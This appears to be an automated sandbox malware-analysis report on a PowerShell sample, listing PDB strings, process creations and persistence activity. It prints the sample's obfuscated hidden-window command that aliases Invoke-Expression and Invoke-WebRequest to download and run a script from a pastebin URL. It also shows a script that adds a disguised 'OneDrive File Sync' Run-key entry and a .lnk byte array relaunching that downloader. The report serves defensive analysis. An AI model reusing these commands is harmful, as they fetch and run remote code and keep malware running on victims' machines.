Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07092000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1985627382.0000012D9C176000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C12D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C0FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787154201.000001AC21519000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 0000000B.00000002.1984540562.0000012D9C0CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1785758813.000001AC210D2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Wn.pdbW source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb5 source: powershell.exe, 0000000F.00000002.2097911500.000001CA46248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.2094788479.000001CA46053000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000000.00000002.1757321925.000001AC07012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1985627382.0000012D9C156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb"V source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.2096475420.000001CA461D3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.pdb source: powershell.exe, 00000000.00000002.1757798711.000001AC0A65A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.pdbhPp source: powershell.exe, 00000000.00000002.1757798711.000001AC0A65A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887AE54B8 pushfd ; iretd 0_2_00007FF887AE5591
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA54C4 push ss; iretd 0_2_00007FF887BA54E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA58F0 push ss; iretd 0_2_00007FF887BA58F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA5B9D push ss; iretd 0_2_00007FF887BA5B9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA5711 push ss; iretd 0_2_00007FF887BA5712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA5AB1 push ss; iretd 0_2_00007FF887BA5AB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA5A0B push ss; iretd 0_2_00007FF887BA5A0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887BA55BB push ss; iretd 0_2_00007FF887BA55BC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AF2558 push E8FFFFFFh; iretd 11_2_00007FF887AF255D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AEE1CA push edx; iretd 11_2_00007FF887AEE1CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887AE4963 push eax; iretd 11_2_00007FF887AE4971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887BB6DC3 push edi; iretd 11_2_00007FF887BB6DC6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.dllJump to dropped file

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
